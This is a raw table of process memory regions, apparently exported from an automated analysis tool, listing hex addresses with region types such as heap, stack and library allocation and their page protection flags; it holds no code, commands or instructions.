page read and write
8980000
unkown
page read and write
B90000
heap
page read and write
5949000
unkown
page read and write
161E000
heap
page read and write
53A0000
heap
page read and write
32B3000
heap
page read and write
6FCE000
stack
page read and write
2B44000
heap
page read and write
22CBCBA3000
heap
page read and write
7BBF000
stack
page read and write
22CBCB4C000
heap
page read and write
24ABAADB000
heap
page read and write
8F10000
unkown
page read and write
22CBCB5B000
heap
page read and write
5121000
heap
page read and write
2B44000
heap
page read and write
24ABAAC3000
heap
page read and write
24ABAADB000
heap
page read and write
2B44000
heap
page read and write
5121000
heap
page read and write
8B70000
unkown
page read and write
8B70000
unkown
page read and write
5681000
heap
page read and write
7FF5D72BD000
unkown
page readonly
24ABA7BA000
heap
page read and write
7FF5D748A000
unkown
page readonly
24ABAADB000
heap
page read and write
22CBCBC3000
heap
page read and write
8B70000
unkown
page read and write
22CBCB93000
heap
page read and write
7FF5D72D0000
unkown
page readonly
22CBCB7B000
heap
page read and write
674000
heap
page read and write
5121000
heap
page read and write
24ABAADB000
heap
page read and write
E4CB000
stack
page read and write
5121000
heap
page read and write
3510000
trusted library allocation
page read and write
3000000
unkown
page read and write
22CBCBC3000
heap
page read and write
24ABAA5B000
heap
page read and write
8F10000
unkown
page read and write
8880000
unkown
page readonly
24ABAADB000
heap
page read and write
4203000
trusted library allocation
page execute and read and write
8B70000
unkown
page read and write
11C0000
unkown
page read and write
5121000
heap
page read and write
4986000
unkown
page read and write
11D0000
unkown
page read and write
7AC0000
unkown
page read and write
9AA8000
unkown
page read and write
46CA000
heap
page read and write
5121000
heap
page read and write
1100000
unkown
page read and write
22CBCB63000
heap
page read and write
22CBCB63000
heap
page read and write
24ABAB3B000
heap
page read and write
E54D000
stack
page read and write
41F000
heap
page read and write
5121000
heap
page read and write
7FF5D7376000
unkown
page readonly
24ABAACB000
heap
page read and write
8980000
unkown
page read and write
7D1000
system
page execute and read and write
4F10000
trusted library allocation
page read and write
8980000
unkown
page read and write
918D000
trusted library allocation
page read and write
8980000
unkown
page read and write
5121000
heap
page read and write
7FF5D7643000
unkown
page readonly
8B70000
unkown
page read and write
22CBCBC3000
heap
page read and write
7FF5D771A000
unkown
page readonly
7FF5D72CE000
unkown
page readonly
24ABAAE3000
heap
page read and write
22CBCB63000
heap
page read and write
5121000
heap
page read and write
11C0000
unkown
page read and write
1190000
unkown
page read and write
24ABAB8B000
heap
page read and write
1100000
unkown
page read and write
7FF5D75D9000
unkown
page readonly
8B70000
unkown
page read and write
4630000
heap
page read and write
5F0000
unkown
page readonly
24ABAAA4000
heap
page read and write
5121000
heap
page read and write
24ABAB5B000
heap
page read and write
3471000
heap
page read and write
5121000
heap
page read and write
A7C000
heap
page read and write
228A000
heap
page read and write
35CF000
heap
page read and write
5681000
heap
page read and write
5A41000
heap
page read and write
5AF8000
heap
page read and write
33AC000
heap
page read and write
7DF488D25000
unkown
page read and write
24ABAA55000
heap
page read and write
8980000
unkown
page read and write
1170000
unkown
page read and write
33AC000
heap
page read and write
22CBCB5B000
heap
page read and write
5476000
unkown
page read and write
5121000
heap
page read and write
D23000
heap
page read and write
A220000
unkown
page read and write
22CBCB93000
heap
page read and write
55FE000
stack
page read and write
24ABAA46000
heap
page read and write
22CBCB63000
heap
page read and write
32BF000
heap
page read and write
5121000
heap
page read and write
2B44000
heap
page read and write
3DF0000
heap
page read and write
24ABAACB000
heap
page read and write
3FFF000
stack
page read and write
53C0000
direct allocation
page read and write
74BE000
stack
page read and write
24ABAA46000
heap
page read and write
C5F4000
unkown
page read and write
346D000
heap
page read and write
22CBCB5B000
heap
page read and write
1230000
trusted library allocation
page read and write
24ABAAFB000
heap
page read and write
7AF1000
unkown
page read and write
24ABAAD3000
heap
page read and write
4AE0000
trusted library allocation
page read and write
8B70000
unkown
page read and write
24ABAACB000
heap
page read and write
B6A6000
trusted library allocation
page read and write
24ABAA72000
heap
page read and write
2B44000
heap
page read and write
11C0000
unkown
page read and write
5121000
heap
page read and write
1100000
unkown
page read and write
1190000
unkown
page read and write
24ABAAFB000
heap
page read and write
22CBCB43000
heap
page read and write
5121000
heap
page read and write
24ABAADB000
heap
page read and write
24ABA31C000
heap
page read and write
24ABA7CB000
heap
page read and write
770E000
stack
page read and write
C8E000
stack
page read and write
11C0000
unkown
page read and write
24ABAA9C000
heap
page read and write
7FF5D7404000
unkown
page readonly
2B44000
heap
page read and write
24ABAACB000
heap
page read and write
22CBCB8B000
heap
page read and write
8B70000
unkown
page read and write
8980000
unkown
page read and write
774D000
stack
page read and write
5121000
heap
page read and write
22CBCDFC000
heap
page read and write
2F5A000
heap
page read and write
2B44000
heap
page read and write
11C0000
unkown
page read and write
24ABAA48000
heap
page read and write
5681000
heap
page read and write
5E59000
heap
page read and write
8B70000
unkown
page read and write
24ABAB43000
heap
page read and write
5681000
heap
page read and write
3626000
unkown
page read and write
1100000
unkown
page read and write
9679000
stack
page read and write
5121000
heap
page read and write
3000000
unkown
page read and write
5121000
heap
page read and write
24ABAAC3000
heap
page read and write
24ABAB23000
heap
page read and write
4B00000
unkown
page read and write
8980000
unkown
page read and write
1190000
unkown
page read and write
7FF5D7407000
unkown
page readonly
24ABAAF3000
heap
page read and write
7FF5D75E9000
unkown
page readonly
5121000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
5E97000
heap
page read and write
5121000
heap
page read and write
24ABAA78000
heap
page read and write
1110000
unkown
page read and write
24ABAB5B000
heap
page read and write
35FE000
stack
page read and write
5121000
heap
page read and write
24ABAAE3000
heap
page read and write
24ABAADB000
heap
page read and write
1100000
unkown
page read and write
24ABAAB3000
heap
page read and write
7DF4F2461000
unkown
page execute read
5121000
heap
page read and write
1FF71260000
heap
page read and write
4AFA000
unkown
page read and write
5121000
heap
page read and write
5AF8000
heap
page read and write
19D000
stack
page read and write
674000
heap
page read and write
7FF5D732D000
unkown
page readonly
24ABAB3B000
heap
page read and write
7FF5D75AF000
unkown
page readonly
3410000
unkown
page read and write
1170000
unkown
page read and write
24ABAACB000
heap
page read and write
24ABAB23000
heap
page read and write
11C0000
unkown
page read and write
5121000
heap
page read and write
24ABAAC3000
heap
page read and write
8220000
trusted library allocation
page execute and read and write
5681000
heap
page read and write
11A0000
unkown
page read and write
5121000
heap
page read and write
700D000
stack
page read and write
35D8000
heap
page read and write
24ABAACB000
heap
page read and write
658C000
stack
page read and write
22CBCB5B000
heap
page read and write
1100000
unkown
page read and write
2B44000
heap
page read and write
9A9E000
unkown
page read and write
11C0000
unkown
page read and write
11C0000
unkown
page read and write
11C0000
unkown
page read and write
5681000
heap
page read and write
5121000
heap
page read and write
3140000
unkown
page read and write
22CBCB5E000
heap
page read and write
24ABAACB000
heap
page read and write
5121000
heap
page read and write
5E8C000
heap
page read and write
24ABAAE3000
heap
page read and write
345D000
heap
page read and write
7FF5D779E000
unkown
page readonly
8F10000
unkown
page read and write
24ABAAE3000
heap
page read and write
2F80000
unkown
page read and write
22CBCB4B000
heap
page read and write
6DF3000
heap
page read and write
5121000
heap
page read and write
24ABA7E3000
heap
page read and write
24ABAACB000
heap
page read and write
24ABAAF3000
heap
page read and write
24ABAA72000
heap
page read and write
7FF5D758D000
unkown
page readonly
11D0000
unkown
page read and write
22CBCB5B000
heap
page read and write
D33000
heap
page read and write
7DF4F2460000
unkown
page readonly
5121000
heap
page read and write
24ABAAC3000
heap
page read and write
24ABA884000
heap
page read and write
45EE000
stack
page read and write
22CBCB73000
heap
page read and write
5121000
heap
page read and write
24ABAAC3000
heap
page read and write
7FF5D74A6000
unkown
page readonly
24ABAAE3000
heap
page read and write
1100000
unkown
page read and write
22CBCB4B000
heap
page read and write
5121000
heap
page read and write
24ABA7FA000
heap
page read and write
22CBCB63000
heap
page read and write
1100000
unkown
page read and write
2B44000
heap
page read and write
22CBCB93000
heap
page read and write
24ABAAFB000
heap
page read and write
5121000
heap
page read and write
22CBCB4B000
heap
page read and write
ED0000
trusted library allocation
page read and write
1F0000
heap
page read and write
33AD000
heap
page read and write
5E80000
heap
page read and write
24ABAB5B000
heap
page read and write
2B44000
heap
page read and write
8B70000
unkown
page read and write
24ABAB13000
heap
page read and write
24ABAB5B000
heap
page read and write
5AF8000
heap
page read and write
8F10000
unkown
page read and write
4F10000
trusted library allocation
page read and write
5121000
heap
page read and write
22CBCB4B000
heap
page read and write
24ABAACB000
heap
page read and write
D4D000
heap
page read and write
35C0000
heap
page read and write
5596000
heap
page read and write
2B44000
heap
page read and write
5121000
heap
page read and write
22CBCB43000
heap
page read and write
24ABAADB000
heap
page read and write
7FF5D6BE4000
unkown
page readonly
5121000
heap
page read and write
11A0000
unkown
page read and write
5681000
heap
page read and write
3124000
heap
page read and write
24ABAB13000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
8F10000
unkown
page read and write
8B70000
unkown
page read and write
24ABAAC3000
heap
page read and write
5E59000
heap
page read and write
22CBCB4B000
heap
page read and write
2DA4000
heap
page read and write
760B000
unkown
page read and write
3444000
heap
page read and write
46AA000
heap
page read and write
5121000
heap
page read and write
5681000
heap
page read and write
33AC000
heap
page read and write
5681000
heap
page read and write
346F000
heap
page read and write
5121000
heap
page read and write
7DF488D1B000
unkown
page read and write
5121000
heap
page read and write
4204000
trusted library allocation
page read and write
5121000
heap
page read and write
24AB8980000
heap
page read and write
8B70000
unkown
page read and write
24ABAAC3000
heap
page read and write
5681000
heap
page read and write
22CBCB43000
heap
page read and write
24ABAA64000
heap
page read and write
353E000
stack
page read and write
4DE9000
heap
page read and write
7FF5D7391000
unkown
page readonly
5121000
heap
page read and write
8B70000
unkown
page read and write
51D0000
unkown
page read and write
24ABAACB000
heap
page read and write
4CE1000
heap
page read and write
24ABAAC3000
heap
page read and write
A4470FD000
stack
page read and write
9EAB000
stack
page read and write
8B70000
unkown
page read and write
5596000
heap
page read and write
2B44000
heap
page read and write
5121000
heap
page read and write
22CBCB63000
heap
page read and write
24ABAADB000
heap
page read and write
7090000
trusted library allocation
page read and write
5121000
heap
page read and write
7B0000
heap
page read and write
22CBCB5B000
heap
page read and write
11C0000
unkown
page read and write
7FF5D74B3000
unkown
page readonly
403E000
stack
page read and write
9AAA000
unkown
page read and write
24ABAAFB000
heap
page read and write
8B70000
unkown
page read and write
5681000
heap
page read and write
5121000
heap
page read and write
3000000
unkown
page read and write
7FF5D7272000
unkown
page readonly
24ABA624000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
1190000
unkown
page read and write
7FF5D71AF000
unkown
page readonly
22CBCBAB000
heap
page read and write
24ABAA78000
heap
page read and write
F536000
unkown
page read and write
5340000
unkown
page read and write
5720000
unkown
page read and write
24ABA899000
heap
page read and write
1100000
unkown
page read and write
33AC000
heap
page read and write
400000
unkown
page readonly
24ABAAE3000
heap
page read and write
24ABAAFB000
heap
page read and write
8B70000
unkown
page read and write
5121000
heap
page read and write
2B44000
heap
page read and write
24ABAAF3000
heap
page read and write
5121000
heap
page read and write
6DFF000
heap
page read and write
5681000
heap
page read and write
6E60000
trusted library allocation
page read and write
7FF848E6C000
trusted library allocation
page execute and read and write
24ABAAC3000
heap
page read and write
1100000
unkown
page read and write
24ABACE8000
heap
page read and write
D4E000
heap
page read and write
35C3000
heap
page read and write
24ABA7CA000
heap
page read and write
2930000
heap
page read and write
1190000
unkown
page read and write
11D0000
unkown
page read and write
AF5000
heap
page read and write
22CBCB5B000
heap
page read and write
22CBCB4B000
heap
page read and write
5681000
heap
page read and write
8F10000
unkown
page read and write
33AC000
heap
page read and write
22CBCB43000
heap
page read and write
8F10000
unkown
page read and write
114A000
unkown
page read and write
1150000
unkown
page read and write
24ABAB3B000
heap
page read and write
22CBCB5B000
heap
page read and write
11C0000
unkown
page read and write
3260000
heap
page read and write
24ABAB0B000
heap
page read and write
5921000
heap
page read and write
76F8000
unkown
page read and write
1170000
unkown
page read and write
674000
heap
page read and write
1170000
unkown
page read and write
5121000
heap
page read and write
1FF71180000
heap
page read and write
48E0000
heap
page read and write
5121000
heap
page read and write
10EBD000
unkown
page read and write
24ABAAE3000
heap
page read and write
22CBCB5B000
heap
page read and write
AA0000
trusted library allocation
page read and write
45A0000
trusted library allocation
page read and write
5121000
heap
page read and write
7B7D000
stack
page read and write
2B44000
heap
page read and write
5E59000
heap
page read and write
5121000
heap
page read and write
1FF712E1000
heap
page read and write
26AE000
stack
page read and write
24ABAAC3000
heap
page read and write
7FF5D75DF000
unkown
page readonly
8B70000
unkown
page read and write
3510000
trusted library allocation
page read and write
22CBCB4B000
heap
page read and write
22CBCB43000
heap
page read and write
4270000
heap
page read and write
2B44000
heap
page read and write
8B70000
unkown
page read and write
4B80000
trusted library allocation
page read and write
7FF5D7442000
unkown
page readonly
2B44000
heap
page read and write
53E9000
unkown
page read and write
22CBCB5B000
heap
page read and write
4FE000
heap
page read and write
24ABAADB000
heap
page read and write
24ABAAC3000
heap
page read and write
5121000
heap
page read and write
24ABAA9C000
heap
page read and write
5681000
heap
page read and write
5121000
heap
page read and write
24ABAB53000
heap
page read and write
8F10000
unkown
page read and write
24ABAB73000
heap
page read and write
1360000
unkown
page readonly
1230000
trusted library allocation
page read and write
22CBCB43000
heap
page read and write
11A0000
unkown
page read and write
7FF5D7691000
unkown
page readonly
5095000
heap
page read and write
3029000
trusted library allocation
page read and write
24ABAADB000
heap
page read and write
1170000
unkown
page read and write
24ABAB3B000
heap
page read and write
5121000
heap
page read and write
25C0000
trusted library allocation
page read and write
5020000
heap
page read and write
8700000
trusted library allocation
page read and write
A2A2000
unkown
page read and write
22CBCB4B000
heap
page read and write
8B70000
unkown
page read and write
5EF8000
heap
page read and write
22CBCB4B000
heap
page read and write
7693000
unkown
page read and write
35ED000
heap
page read and write
8B70000
unkown
page read and write
20E765A0000
heap
page read and write
24ABAAE3000
heap
page read and write
D4B000
heap
page read and write
24ABA7CC000
heap
page read and write
400000
unkown
page readonly
8B70000
unkown
page read and write
24ABAAE3000
heap
page read and write
35F4000
unkown
page read and write
22CBCBA3000
heap
page read and write
AA0000
trusted library allocation
page read and write
8B70000
unkown
page read and write
1190000
unkown
page read and write
4F0000
heap
page read and write
24ABAAE3000
heap
page read and write
24ABAAE3000
heap
page read and write
5AF8000
heap
page read and write
22CBCB5B000
heap
page read and write
3597000
heap
page read and write
8B70000
unkown
page read and write
656000
unkown
page read and write
D37000
heap
page read and write
8F10000
unkown
page read and write
4DE2000
heap
page read and write
7FF5D77CD000
unkown
page readonly
7FF5D7455000
unkown
page readonly
C44F000
stack
page read and write
24ABA7F5000
heap
page read and write
CA16000
unkown
page read and write
22CBCB73000
heap
page read and write
8B70000
unkown
page read and write
5AF8000
heap
page read and write
8B70000
unkown
page read and write
22CBCB63000
heap
page read and write
42A0000
heap
page read and write
5AF8000
heap
page read and write
24ABA32F000
heap
page read and write
DBE000
stack
page read and write
5121000
heap
page read and write
3510000
trusted library allocation
page read and write
160E000
heap
page read and write
5AF8000
heap
page read and write
5AF8000
heap
page read and write
4BDE000
stack
page read and write
57A3000
unkown
page read and write
4B21000
heap
page read and write
24ABAA91000
heap
page read and write
35B5000
heap
page read and write
8B70000
unkown
page read and write
C1CC000
stack
page read and write
77DB000
unkown
page read and write
5AF8000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
35D8000
heap
page read and write
22CBCB7B000
heap
page read and write
24ABAAC3000
heap
page read and write
33AC000
heap
page read and write
24ABAAB3000
heap
page read and write
33AC000
heap
page read and write
5121000
heap
page read and write
24ABAAC3000
heap
page read and write
7686000
unkown
page read and write
2B44000
heap
page read and write
5AF8000
heap
page read and write
1190000
unkown
page read and write
22CBCB4B000
heap
page read and write
A446AFE000
stack
page read and write
65B000
unkown
page readonly
24ABA7C4000
heap
page read and write
445000
unkown
page readonly
5463000
unkown
page read and write
4F10000
trusted library allocation
page read and write
1190000
unkown
page read and write
22CBCB7B000
heap
page read and write
5121000
heap
page read and write
1190000
unkown
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
3270000
heap
page read and write
1210000
unkown
page read and write
8B70000
unkown
page read and write
B220000
unkown
page read and write
5681000
heap
page read and write
8B70000
unkown
page read and write
5121000
heap
page read and write
22CBCB5B000
heap
page read and write
5121000
heap
page read and write
24ABAAFB000
heap
page read and write
3130000
heap
page read and write
5121000
heap
page read and write
24ABAAE3000
heap
page read and write
D10000
heap
page read and write
33AC000
heap
page read and write
24ABAAE3000
heap
page read and write
24ABA86E000
heap
page read and write
5596000
heap
page read and write
5AF8000
heap
page read and write
336E000
stack
page read and write
5681000
heap
page read and write
5496000
unkown
page read and write
8F10000
unkown
page read and write
5121000
heap
page read and write
77B0000
trusted library allocation
page read and write
24ABA7E4000
heap
page read and write
24ABAAE3000
heap
page read and write
24ABA875000
heap
page read and write
5121000
heap
page read and write
2B44000
heap
page read and write
33AC000
heap
page read and write
24ABAA85000
heap
page read and write
24ABA89D000
heap
page read and write
5121000
heap
page read and write
24ABAAE3000
heap
page read and write
22CBCB5B000
heap
page read and write
75E0000
unkown
page read and write
24ABA7CF000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
24ABAB23000
heap
page read and write
4B7E000
stack
page read and write
24ABAA67000
heap
page read and write
1100000
unkown
page read and write
24ABAAE3000
heap
page read and write
5121000
heap
page read and write
24ABAADB000
heap
page read and write
22CBCB7B000
heap
page read and write
22CBCB63000
heap
page read and write
5121000
heap
page read and write
22CBCC03000
heap
page read and write
3BB0000
unkown
page read and write
11A0000
unkown
page read and write
7627000
trusted library allocation
page read and write
5121000
heap
page read and write
24ABAAF3000
heap
page read and write
24ABAAE3000
heap
page read and write
24ABAB13000
heap
page read and write
47DB000
heap
page read and write
20E766F5000
heap
page read and write
24ABAAC1000
heap
page read and write
22CBCB5B000
heap
page read and write
7FF5D7700000
unkown
page readonly
4B20000
heap
page read and write
D2E000
heap
page read and write
35CD000
unkown
page read and write
91B2000
trusted library allocation
page read and write
24ABAB73000
heap
page read and write
8B70000
unkown
page read and write
2B44000
heap
page read and write
24ABAA64000
heap
page read and write
5681000
heap
page read and write
5E80000
heap
page read and write
77E0000
trusted library allocation
page read and write
5121000
heap
page read and write
24ABAAD4000
heap
page read and write
5AF8000
heap
page read and write
2B44000
heap
page read and write
33AC000
heap
page read and write
5AF8000
heap
page read and write
24ABAAE3000
heap
page read and write
47F1000
trusted library allocation
page read and write
24ABA7E8000
heap
page read and write
1110000
unkown
page read and write
24ABA871000
heap
page read and write
5121000
heap
page read and write
5AF8000
heap
page read and write
4A40000
unkown
page read and write
25C0000
trusted library allocation
page read and write
11C0000
unkown
page read and write
24ABAAC3000
heap
page read and write
22CBCB63000
heap
page read and write
22CBCBAB000
heap
page read and write
24ABAACB000
heap
page read and write
24ABAAC3000
heap
page read and write
7FF5D6AB6000
unkown
page readonly
24ABA887000
heap
page read and write
5AF8000
heap
page read and write
1100000
unkown
page read and write
BE70000
unkown
page readonly
2EE8000
heap
page read and write
1FF72B2A000
heap
page read and write
B03B000
stack
page read and write
22CBCB5B000
heap
page read and write
5121000
heap
page read and write
22CBCB5B000
heap
page read and write
5121000
heap
page read and write
1FF736C0000
heap
page read and write
22CBCB63000
heap
page read and write
22CBCB7B000
heap
page read and write
22CBCB43000
heap
page read and write
5121000
heap
page read and write
22CBCB93000
heap
page read and write
7DF488CDF000
unkown
page read and write
22CBCB63000
heap
page read and write
2F80000
unkown
page read and write
22CBCB63000
heap
page read and write
24ABA9F0000
heap
page read and write
1395000
heap
page read and write
22CBC702000
heap
page read and write
4200000
trusted library allocation
page read and write
B561000
unkown
page read and write
22CBCB93000
heap
page read and write
24ABAACB000
heap
page read and write
1230000
trusted library allocation
page read and write
33F0000
heap
page read and write
5121000
heap
page read and write
618000
heap
page read and write
1110000
unkown
page read and write
8B70000
unkown
page read and write
5121000
heap
page read and write
5AF8000
heap
page read and write
6D9D000
heap
page read and write
7FF5D7065000
unkown
page readonly
3510000
trusted library allocation
page read and write
8980000
unkown
page read and write
3580000
heap
page read and write
2B44000
heap
page read and write
7FF848E2D000
trusted library allocation
page execute and read and write
2B44000
heap
page read and write
22CBCB4B000
heap
page read and write
22CBCB93000
heap
page read and write
462A000
heap
page read and write
22CBCB63000
heap
page read and write
24ABAB00000
heap
page read and write
52C0000
unkown
page read and write
3074000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
24ABAAF3000
heap
page read and write
3DC8000
heap
page read and write
24ABA7E4000
heap
page read and write
5121000
heap
page read and write
22CBCB43000
heap
page read and write
10E0000
trusted library allocation
page read and write
24ABAA89000
heap
page read and write
5AF8000
heap
page read and write
11C0000
unkown
page read and write
11C0000
unkown
page read and write
8CC0000
unkown
page read and write
1100000
unkown
page read and write
22CBCB5B000
heap
page read and write
5121000
heap
page read and write
24ABAACB000
heap
page read and write
4DED000
stack
page read and write
24ABAACB000
heap
page read and write
22CBCB43000
heap
page read and write
22CBCB63000
heap
page read and write
8752000
trusted library allocation
page read and write
437000
unkown
page readonly
5AF8000
heap
page read and write
1230000
unkown
page read and write
7140000
heap
page execute and read and write
2B44000
heap
page read and write
5865000
heap
page read and write
3040000
heap
page read and write
5121000
heap
page read and write
8B70000
unkown
page read and write
22CBC6D5000
heap
page read and write
C908000
unkown
page read and write
C48B000
unkown
page read and write
5121000
heap
page read and write
8F10000
unkown
page read and write
22CBCB33000
heap
page read and write
6D77000
heap
page read and write
1100000
unkown
page read and write
5E76000
heap
page read and write
1100000
unkown
page read and write
24ABAAAB000
heap
page read and write
5595000
heap
page read and write
7FF5D7639000
unkown
page readonly
29EC000
stack
page read and write
22CBCB5B000
heap
page read and write
11A0000
unkown
page read and write
F13000
heap
page read and write
22CBCB73000
heap
page read and write
A49000
heap
page read and write
A82000
heap
page read and write
24ABAAFB000
heap
page read and write
1100000
unkown
page read and write
1FF712EC000
heap
page read and write
CBD000
heap
page read and write
114A000
unkown
page read and write
22CBCB33000
heap
page read and write
600000
heap
page read and write
22CBCB4B000
heap
page read and write
24ABAB13000
heap
page read and write
5121000
heap
page read and write
24ABAACB000
heap
page read and write
94CB000
trusted library allocation
page read and write
427A000
heap
page read and write
24ABAAE3000
heap
page read and write
8330000
trusted library allocation
page read and write
24ABAB0B000
heap
page read and write
5243000
unkown
page read and write
22CBC621000
heap
page read and write
5121000
heap
page read and write
35ED000
heap
page read and write
3444000
heap
page read and write
2B44000
heap
page read and write
2B44000
heap
page read and write
24ABAA68000
heap
page read and write
22CBCB8B000
heap
page read and write
1190000
unkown
page read and write
5681000
heap
page read and write
5121000
heap
page read and write
5681000
heap
page read and write
11C0000
unkown
page read and write
2610000
heap
page read and write
24ABAB13000
heap
page read and write
22CBCB63000
heap
page read and write
3410000
unkown
page read and write
11E0000
unkown
page read and write
22CBCB73000
heap
page read and write
22CBCB4B000
heap
page read and write
8B70000
unkown
page read and write
1190000
unkown
page read and write
24ABAAE3000
heap
page read and write
22CBCB4B000
heap
page read and write
24ABA89B000
heap
page read and write
11C0000
unkown
page read and write
94F000
stack
page read and write
4DE9000
heap
page read and write
5121000
heap
page read and write
8B70000
unkown
page read and write
2B44000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
754F000
heap
page read and write
5121000
heap
page read and write
22CBCB4B000
heap
page read and write
50A1000
heap
page read and write
24ABAA4B000
heap
page read and write
1100000
unkown
page read and write
1000000
heap
page read and write
22CBCB33000
heap
page read and write
24ABA7E9000
heap
page read and write
24ABA898000
heap
page read and write
53E1000
unkown
page read and write
8B70000
unkown
page read and write
5681000
heap
page read and write
5121000
heap
page read and write
22CBC31B000
heap
page read and write
8980000
unkown
page read and write
BA0000
trusted library allocation
page read and write
32C6000
heap
page read and write
24ABA7A2000
heap
page read and write
AA0000
trusted library allocation
page read and write
896E000
stack
page read and write
24ABA7CB000
heap
page read and write
5121000
heap
page read and write
7FF5D6ABD000
unkown
page readonly
24ABAAFB000
heap
page read and write
24ABAB0B000
heap
page read and write
2B44000
heap
page read and write
2B44000
heap
page read and write
5681000
heap
page read and write
2B44000
heap
page read and write
2B44000
heap
page read and write
114A000
unkown
page read and write
24ABAACB000
heap
page read and write
22CBCB8B000
heap
page read and write
24ABA897000
heap
page read and write
8980000
unkown
page read and write
1190000
unkown
page read and write
24ABAAA6000
heap
page read and write
5121000
heap
page read and write
8B70000
unkown
page read and write
11C0000
unkown
page read and write
5121000
heap
page read and write
7FF5D7558000
unkown
page readonly
5290000
unkown
page read and write
1190000
unkown
page read and write
22CBCB93000
heap
page read and write
5121000
heap
page read and write
4CE1000
heap
page read and write
5121000
heap
page read and write
1190000
unkown
page read and write
5121000
heap
page read and write
8B70000
unkown
page read and write
24ABAAC3000
heap
page read and write
2B44000
heap
page read and write
425A000
heap
page read and write
24ABAB23000
heap
page read and write
24ABAB0B000
heap
page read and write
83A0000
trusted library allocation
page read and write
22CBCB4B000
heap
page read and write
8FD9000
stack
page read and write
24ABAAE4000
heap
page read and write
7FF5D728E000
unkown
page readonly
ED0000
trusted library allocation
page read and write
5121000
heap
page read and write
11A0000
unkown
page read and write
1110000
unkown
page read and write
24ABAB2B000
heap
page read and write
8B70000
unkown
page read and write
22CBCB5B000
heap
page read and write
24ABAA46000
heap
page read and write
5C9000
unkown
page read and write
5681000
heap
page read and write
1230000
unkown
page read and write
24ABA874000
heap
page read and write
24ABA7A1000
heap
page read and write
5121000
heap
page read and write
24ABAADB000
heap
page read and write
24ABAAFB000
heap
page read and write
20E76593000
heap
page read and write
ED0000
trusted library allocation
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
5AF8000
heap
page read and write
A264000
unkown
page read and write
22CBCB63000
heap
page read and write
5121000
heap
page read and write
2210000
heap
page read and write
35C3000
unkown
page read and write
22CBCB8B000
heap
page read and write
24ABAAC3000
heap
page read and write
3BA0000
unkown
page read and write
8B70000
unkown
page read and write
24ABAA67000
heap
page read and write
75C6000
heap
page read and write
24ABAACB000
heap
page read and write
4F10000
trusted library allocation
page read and write
32BF000
heap
page read and write
3014000
trusted library allocation
page read and write
24ABAAE3000
heap
page read and write
5121000
heap
page read and write
11C0000
unkown
page read and write
24ABAADB000
heap
page read and write
5AF8000
heap
page read and write
2F80000
unkown
page read and write
7760000
trusted library allocation
page execute and read and write
161E000
heap
page read and write
22CBCB7B000
heap
page read and write
5AF8000
heap
page read and write
7FF848E34000
trusted library allocation
page read and write
5121000
heap
page read and write
8B70000
unkown
page read and write
1FF712D9000
heap
page read and write
5561000
heap
page read and write
EF183FF000
stack
page read and write
2B44000
heap
page read and write
5121000
heap
page read and write
2A50000
trusted library allocation
page read and write
24ABAA81000
heap
page read and write
5AF8000
heap
page read and write
19A000
heap
page read and write
22CBCB8B000
heap
page read and write
8B70000
unkown
page read and write
4AC0000
unkown
page read and write
697D000
stack
page read and write
24ABA873000
heap
page read and write
5121000
heap
page read and write
22CBC6F4000
heap
page read and write
24ABAAE3000
heap
page read and write
7FF5D777A000
unkown
page readonly
5121000
heap
page read and write
35CF000
heap
page read and write
22CBCB93000
heap
page read and write
24ABAACB000
heap
page read and write
22CBCBC3000
heap
page read and write
24ABAAE3000
heap
page read and write
24ABA886000
heap
page read and write
1FF72CD0000
heap
page read and write
7FF5D7808000
unkown
page readonly
3C80000
unkown
page read and write
24ABAACB000
heap
page read and write
2B44000
heap
page read and write
1230000
trusted library allocation
page read and write
644000
unkown
page readonly
24ABAA72000
heap
page read and write
1143000
unkown
page read and write
24ABAB2B000
heap
page read and write
22CBCB8B000
heap
page read and write
24ABAAE3000
heap
page read and write
41B000
heap
page read and write
5270000
unkown
page read and write
22CBCBA3000
heap
page read and write
3444000
heap
page read and write
6B2C000
trusted library allocation
page read and write
1210000
unkown
page read and write
3000000
unkown
page read and write
91FA000
trusted library allocation
page read and write
8B70000
unkown
page read and write
24ABA88C000
heap
page read and write
5681000
heap
page read and write
24ABAAE3000
heap
page read and write
5121000
heap
page read and write
11D0000
unkown
page read and write
7FF5D760B000
unkown
page readonly
24ABAB43000
heap
page read and write
3510000
trusted library allocation
page read and write
24ABA888000
heap
page read and write
8F10000
unkown
page read and write
4D70000
trusted library allocation
page read and write
2B44000
heap
page read and write
25C0000
trusted library allocation
page read and write
24ABAAFB000
heap
page read and write
7AE0000
unkown
page read and write
24ABAAC3000
heap
page read and write
1230000
trusted library allocation
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
24ABAB13000
heap
page read and write
1230000
trusted library allocation
page read and write
24ABAACB000
heap
page read and write
91AC000
trusted library allocation
page read and write
24ABAAE3000
heap
page read and write
8B70000
unkown
page read and write
25C0000
trusted library allocation
page read and write
5AF8000
heap
page read and write
24ABAACB000
heap
page read and write
24ABAAE3000
heap
page read and write
22CBCB7B000
heap
page read and write
22CBCB43000
heap
page read and write
32C3000
heap
page read and write
11D0000
unkown
page read and write
5121000
heap
page read and write
8F10000
unkown
page read and write
22CBCB4B000
heap
page read and write
D22000
heap
page read and write
5AF8000
heap
page read and write
8F10000
unkown
page read and write
22CBCBAB000
heap
page read and write
AA0000
trusted library allocation
page read and write
2B44000
heap
page read and write
5AF8000
heap
page read and write
9A96000
unkown
page read and write
1FF71314000
heap
page read and write
22CBC66A000
heap
page read and write
4CE1000
heap
page read and write
24ABAAFB000
heap
page read and write
3000000
unkown
page read and write
5121000
heap
page read and write
463A000
heap
page read and write
8F10000
unkown
page read and write
2B44000
heap
page read and write
4AE000
stack
page read and write
11D0000
unkown
page read and write
7FF5D7230000
unkown
page readonly
5AF8000
heap
page read and write
24ABAADB000
heap
page read and write
46A0000
heap
page read and write
A82000
heap
page read and write
22CBCBD3000
heap
page read and write
22CBCB63000
heap
page read and write
25C0000
trusted library allocation
page read and write
114A000
unkown
page read and write
AA94000
unkown
page read and write
2B44000
heap
page read and write
24ABAACB000
heap
